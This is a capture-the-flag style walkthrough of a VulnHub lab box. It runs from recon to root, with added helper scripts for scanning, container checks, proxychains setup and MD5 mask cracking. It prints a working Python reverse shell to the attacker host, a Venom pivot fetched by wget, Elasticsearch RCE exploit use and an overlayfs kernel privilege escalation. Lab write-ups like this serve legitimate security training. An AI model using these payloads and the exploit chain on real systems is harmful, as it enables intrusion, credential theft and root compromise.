Target information
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/
Hosts, ports, services
- Host discovery: arp-scan -l
- nmap -sP 192.168.0.1/24 (ping sweep; -sP is the old spelling of -sn)
- Port discovery: nmap -p- 192.168.0.102
- Service discovery: nmap -p22,5000 -sV 192.168.0.102
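The three recon phases above chained into one script, as an added example that is not part of the original write-up: the open-port list parsed from the -p- pass is fed straight into the -sV pass instead of being retyped. The subnet and target default to this lab's addresses (an assumption), and the sample -oG output used by demo_open_ports is constructed.

```shell
#!/bin/sh
# Added example, not from the original write-up. Chains the three recon
# phases (host discovery, full port discovery, service detection) so the
# open-port list from the -p- pass feeds the -sV pass. SUBNET/TARGET
# default to this lab's addresses and are assumptions.
SUBNET="${SUBNET:-192.168.0.0/24}"
TARGET="${TARGET:-192.168.0.102}"

# Constructed sample of nmap grepable (-oG) output for a host with 22 and
# 5000 open and 80 filtered (real output separates fields with tabs; the
# parser does not care). Used only by demo_open_ports.
SAMPLE_OG="$(printf '%s\n' \
  '# Nmap 7.94 scan initiated (constructed sample)' \
  'Host: 192.168.0.102 ()  Status: Up' \
  'Host: 192.168.0.102 ()  Ports: 22/open/tcp//ssh///, 5000/open/tcp//upnp///, 80/filtered/tcp//http///  Ignored State: closed (65532)')"

# Extract the open TCP ports from -oG output on stdin as "22,5000".
open_ports() {
    grep '^Host:' \
    | grep -o '[0-9]\{1,5\}/open/tcp' \
    | cut -d/ -f1 \
    | sort -n -u \
    | tr '\n' ',' \
    | sed 's/,$//'
}

demo_open_ports() {
    printf '%s\n' "$SAMPLE_OG" | open_ports
}

# Host discovery: arp-scan on the local segment (needs root and also sees
# hosts that drop ICMP), otherwise an nmap ping sweep (-sn is the current
# spelling of the write-up's -sP).
discover_hosts() {
    if [ "$(id -u)" -eq 0 ] && command -v arp-scan >/dev/null 2>&1; then
        arp-scan -l
    else
        nmap -sn "$SUBNET"
    fi
}

# Full TCP port sweep, then version detection only on the open ports.
scan_target() {
    ports=$(nmap -p- -oG - "$TARGET" | open_ports)
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $TARGET" >&2
        return 1
    fi
    echo "open ports on $TARGET: $ports" >&2
    nmap -p "$ports" -sV "$TARGET"
}

# Touch the network only when asked (RUN_RECON=1 sh recon.sh), so the file
# can be sourced for its functions without starting a scan.
if [ -n "$RUN_RECON" ]; then
    discover_hosts
    scan_target
fi
```

Against this box the parser returns 22,5000, which is exactly the port list the write-up passes to -sV by hand.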
Service discovery
The target exposes port 5000, served by Werkzeug, the WSGI toolkit behind Flask's development server, so the application is written in Python.
Web application penetration
- Open http://192.168.0.102:5000 in a browser
- Directory brute-forcing with a scanner turns up an /admin path
- http://192.168.0.102:5000/admin offers a code-execution function. Because the stack is Python (Werkzeug), the submitted input is most likely evaluated as Python, so the reverse-shell payload has to be Python as well
- Listen on Kali: nc -nvlp 4444
- Reverse shell, which gives a foothold on the box:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.103",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
The connect() address must be the Kali listener (192.168.0.103, the address the agent is fetched from later in this write-up), not the target's own 192.168.0.102 as originally written. The payload duplicates the socket onto stdin, stdout and stderr and then spawns an interactive /bin/sh over it.
Determine whether the target is a Docker container
The shell lands in /app, and the host's address is in 172.17.0.0/16, the default docker0 bridge range, which points to the web application running inside a container. Sweep that range for neighbours.
Internal network scan
/app # for i in $(seq 1 10); do ping -c 1 172.17.0.$i;done
PING 172.17.0.1 (172.17.0.1): 56 data bytes
64 bytes from 172.17.0.1: seq=0 ttl=64 time=0.036 ms
--- 172.17.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.036/0.036/0.036 ms
PING 172.17.0.2 (172.17.0.2): 56 data bytes
64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.041 ms
--- 172.17.0.2 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.041/0.041/0.041 ms
PING 172.17.0.3 (172.17.0.3): 56 data bytes
64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.124 ms
--- 172.17.0.3 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.124/0.124/0.124 ms
PING 172.17.0.4 (172.17.0.4): 56 data bytes
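The container check and the sweep above as an added example, not part of the original write-up. The container check reads the usual indicators (/.dockerenv, PID 1's cgroup, an overlay root filesystem); the sweep prints only hosts that answer instead of dumping every ping. The /proc samples and the probe command are parameters so both can be exercised on constructed input, which is an assumption about how the reader will run it.

```shell
#!/bin/sh
# Added example, not from the original write-up. After the reverse shell
# lands, decide whether it is inside a Docker container, then sweep the
# Docker bridge range for neighbours. File paths and the probe command
# are parameters so both checks can be exercised on constructed input.

# Look for the usual container indicators: the /.dockerenv marker,
# docker/containerd/kubepods names in PID 1's cgroup, and an overlay or
# aufs root filesystem. Prints each hit; returns 0 if anything matched.
container_hints() {
    dockerenv="${1:-/.dockerenv}"
    cgroup="${2:-/proc/1/cgroup}"
    mounts="${3:-/proc/mounts}"
    hits=0
    if [ -e "$dockerenv" ]; then
        echo "hint: $dockerenv exists"; hits=$((hits + 1))
    fi
    if grep -Eq '(docker|containerd|kubepods|lxc)' "$cgroup" 2>/dev/null; then
        echo "hint: container cgroup path in $cgroup"; hits=$((hits + 1))
    fi
    if grep -Eq '^(overlay|aufs) / ' "$mounts" 2>/dev/null; then
        echo "hint: overlay/aufs root filesystem in $mounts"; hits=$((hits + 1))
    fi
    [ "$hits" -gt 0 ]
}

# Write constructed /proc samples (one container, one bare host) into DIR
# so container_hints can be demonstrated without being inside Docker.
write_proc_samples() {
    dir="$1"
    : > "$dir/dockerenv"
    printf '12:pids:/docker/3f2a9c1e0b8d\n1:name=systemd:/docker/3f2a9c1e0b8d\n' > "$dir/cgroup.container"
    printf 'overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/a 0 0\nproc /proc proc rw 0 0\n' > "$dir/mounts.container"
    printf '12:pids:/init.scope\n1:name=systemd:/init.scope\n' > "$dir/cgroup.host"
    printf '/dev/sda1 / ext4 rw,relatime 0 0\nproc /proc proc rw 0 0\n' > "$dir/mounts.host"
}

# Ping sweep of PREFIX.1..LAST (default the docker0 range the write-up
# probes), printing only the hosts that answer. $PROBE can replace ping
# for offline testing; busybox and GNU ping both accept -c 1 -W 1.
sweep() {
    prefix="${1:-172.17.0}"
    last="${2:-254}"
    probe="${PROBE:-ping -c 1 -W 1}"
    i=1
    while [ "$i" -le "$last" ]; do
        ip="$prefix.$i"
        if $probe "$ip" >/dev/null 2>&1; then
            echo "$ip"
        fi
        i=$((i + 1))
    done
}

# On the target: container_hints && sweep 172.17.0 10
```

Busybox is the shell most minimal images ship, which is why the sweep sticks to POSIX arithmetic and avoids seq, bash arrays and fping.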
Internal network pivoting
- Basic idea: use a proxy tool to build a tunnel between Kali and the internal hosts, so that Kali's tooling can reach the internal network through it.
- Venom basic steps:
- Copy the agent to the target: on Kali, serve it with python3 -m http.server 80 (the agent binary is renamed a here);
- On the compromised internal host, fetch it with wget http://192.168.0.103/a and make it executable with chmod +x a
- Start the Venom admin node on Kali: ./admin_linux_x64 -lport 9999
- Start the Venom agent on the target: ./a -rhost 192.168.0.103 -rport 9999
- Venom admin session (the agent connects back, then a SOCKS5 proxy is started on the selected node):
┌──(kali㉿kali)-[~/Desktop/tmp/Venom v1.1.0]
└─$ ./admin_linux_x64 -lport 9999
Venom Admin Node Start...
____ ____ { v1.1 author: Dlive }
\ \ / /____ ____ ____ _____
\ Y // __ \ / \ / \ / \
\ /\ ___/| | ( <_> ) Y Y \
\___/ \___ >___| /\____/|__|_| /
\/ \/ \/
(admin node) >>>
[+]Remote connection: 192.168.0.101:55035
[+]A new node connect to admin node success
(admin node) >>> show
A
+ -- 1
(admin node) >>> goto 1
node 1
(node 1) >>> socks 1080
a socks5 proxy of the target node has started up on the local port 1080.
(node 1) >>>
Configure proxychains
sudo vi /etc/proxychains4.conf
socks5 127.0.0.1 1080
Scan internal addresses with nmap through the proxy. Only full TCP connects traverse a SOCKS proxy, so use -sT, and -Pn because the ICMP/ARP host-discovery probes cannot:
proxychains4 nmap -sT -Pn 172.17.0.1
proxychains4 nmap -sT -Pn -p22,5000 -sV 172.17.0.1
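The proxychains configuration and the pivoted scan as an added example, not part of the original write-up or of Venom. The conf path is a parameter (an assumption, so the rewrite can be tried on a copy before touching /etc/proxychains4.conf), and the sample conf is a constructed stand-in for the tail of Kali's default file.

```shell
#!/bin/sh
# Added example, not from the original write-up. Points proxychains at the
# SOCKS5 port Venom opened (1080) and scans the pivoted network with nmap
# flags that survive a SOCKS tunnel. The conf path is a parameter so the
# rewrite can be exercised on a copy instead of /etc/proxychains4.conf.

# Constructed stand-in for the tail of Kali's default proxychains4.conf
# (Tor's socks4 entry is what ships enabled under [ProxyList]).
write_sample_conf() {
    printf '%s\n' \
        'strict_chain' \
        'proxy_dns' \
        '[ProxyList]' \
        '# add proxy here ...' \
        'socks4  127.0.0.1 9050' > "$1"
}

# Comment out every proxy already listed under [ProxyList] and append ours,
# so the chain holds exactly the Venom SOCKS5 node (with strict_chain a
# stale socks4 9050 entry with nothing listening breaks every connection).
set_socks5_proxy() {
    conf="$1"
    port="${2:-1080}"
    awk -v port="$port" '
        /^\[ProxyList\]/                         { inlist = 1; print; next }
        inlist && /^(socks4|socks5|http)[ \t]/   { print "# " $0; next }
        { print }
        END {
            if (!inlist) print "[ProxyList]"
            print "socks5 127.0.0.1 " port
        }
    ' "$conf" > "$conf.tmp" && mv "$conf.tmp" "$conf"
}

# Scan through the tunnel: SYN scans and ICMP/ARP host discovery never
# enter a SOCKS proxy, so force full TCP connects (-sT), skip host
# discovery (-Pn) and name resolution (-n). Extra nmap args pass through.
pivot_scan() {
    target="$1"; shift
    proxychains4 -q nmap -sT -Pn -n "$@" "$target"
}

# Usage once the Venom node reports "socks 1080" running (sudo for /etc):
#   set_socks5_proxy /etc/proxychains4.conf 1080
#   pivot_scan 172.17.0.2 -p 9200 -sV
```

A SYN scan run through proxychains silently reports everything filtered because the raw packets bypass the proxy; -sT is the fix, not a style choice.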
172.17.0.1 turns out to be the internal (docker0) address of 192.168.0.102 itself, so scan the other hosts:
proxychains4 nmap -p9200 -sV 172.17.0.2
Port 9200 is open and runs Elasticsearch. Use an Elasticsearch remote code execution exploit to get a shell on 172.17.0.2:
┌──(kali㉿kali)-[~]
└─$ searchsploit Elasticsearch
----------------------- ---------------------------------
Exploit Title | Path
----------------------- ---------------------------------
ElasticSearch - Remote | linux/remote/36337.py
ElasticSearch - Remote | multiple/webapps/33370.html
ElasticSearch - Search | java/remote/36415.rb
ElasticSearch 1.6.0 - | linux/webapps/38383.py
ElasticSearch < 1.4.5 | php/webapps/37054.py
ElasticSearch Dynamic | java/remote/33588.rb
----------------------- ---------------------------------
Shellcodes: No Results
cp /usr/share/exploitdb/exploits/linux/remote/36337.py .
proxychains4 python 36337.py 172.17.0.2
(the searchsploit listing above places 36337.py under linux/remote; php/webapps/ holds 37054.py)
- Inspecting the files on 172.17.0.2 reveals a passwords file:
Format: number,number,number,number,lowercase,lowercase,lowercase,lowercase
Example: 1234abcd
john:3f8184a7343664553fcb5337a3138814 (cracks to 1337hack, matching the stated format)
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b
- Log into 192.168.0.102 over SSH (port 22) as john with the cracked password. john is an ordinary user, not root, so look at kernel privilege escalation.
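How the hashes get cracked, as an added example that is not part of the original write-up: the file states its own password format (four digits then four lowercase letters), so a mask attack covers all 10^4 * 26^4 = 4,569,760,000 candidates, which john or hashcat exhaust in minutes. The hashes are the ones printed above; the assumption is that john (jumbo) or hashcat is installed on the Kali box, and md5_matches checks any single guess without either tool.

```shell
#!/bin/sh
# Added example, not from the original write-up. The passwords file hands
# over its own format (4 digits, then 4 lowercase letters), so a mask
# attack covers the whole keyspace. Hashes are the ones shown in the
# write-up; the cracking commands assume john (jumbo) or hashcat on Kali.

# The passwords file contents as printed in the write-up.
HASHES='john:3f8184a7343664553fcb5337a3138814
test:861f194e9d6118f3d942a72be3e51749
admin:670c3bbc209a18dde5446e5e6c1f1d5b
root:b3d34352fc26117979deabdf1b9b6354
jane:5c158b60ed97c723b673529b8a3cf72b'

# Normalise "user:hash[ cracked]" lines from stdin to "user hash", keeping
# only 32-hex-char digests (raw MD5) and dropping any trailing plaintext.
parse_hashes() {
    awk -F'[: ]' 'length($2) == 32 && $2 ~ /^[0-9a-f]+$/ { print $1, $2 }'
}

# Write a john/hashcat-ready "user:hash" file.
write_hashfile() {
    printf '%s\n' "$HASHES" | parse_hashes | awk '{ print $1 ":" $2 }' > "$1"
}

# Check one candidate against one MD5 digest; returns 0 on a match.
md5_matches() {
    hash="$1"; word="$2"
    digest=$(printf '%s' "$word" | md5sum | cut -d' ' -f1)
    [ "$digest" = "$hash" ]
}

# Mask attack: ?d = digit, ?l = lowercase letter. hashcat -m 0 is raw MD5,
# -a 3 is mask mode and --username skips the "user:" prefix; john's --mask
# uses the same syntax and reads user:hash lines natively.
crack_with_mask() {
    hashfile="$1"
    if command -v hashcat >/dev/null 2>&1; then
        hashcat -m 0 -a 3 --username "$hashfile" '?d?d?d?d?l?l?l?l'
    else
        john --format=raw-md5 --mask='?d?d?d?d?l?l?l?l' "$hashfile"
    fi
}

# Confirm the write-up's cracked value for john without either cracker.
demo_confirm_john() {
    if md5_matches 3f8184a7343664553fcb5337a3138814 1337hack; then
        echo "john -> 1337hack (4 digits + 4 lowercase, as the file says)"
    else
        echo "john's hash does not match 1337hack; run crack_with_mask"
    fi
}

# Usage: write_hashfile hashes.txt && crack_with_mask hashes.txt
```

Unsalted MD5 plus a written-down password policy is what makes this cheap: the policy shrinks the keyspace from all 8-character strings to under five billion, and raw MD5 lets a GPU test billions of guesses per second.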
Kernel privilege escalation
- Check the kernel version:
uname -a
Linux socnet 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
- Search for exploits against the 3.13 kernel: searchsploit 3.13
- Review the exploit 37292.c (the overlayfs privilege escalation): it shells out to gcc at runtime to build ofs-lib.so. The target has no compiler, so delete the gcc-related code and place a pre-built ofs-lib.so in the same directory as the exploit instead;
- Compile the modified exploit on Kali (the target is x86_64)
Fetch the compiled exploit and ofs-lib.so onto the target with wget from the http.server started earlier, run it, and a root shell follows.
Commands run on the target machine
Key takeaways:
- Host, port and service scanning
- Web directory scanning
- Python reverse shell
- Internal network scanning and pivoting
- Kernel privilege escalation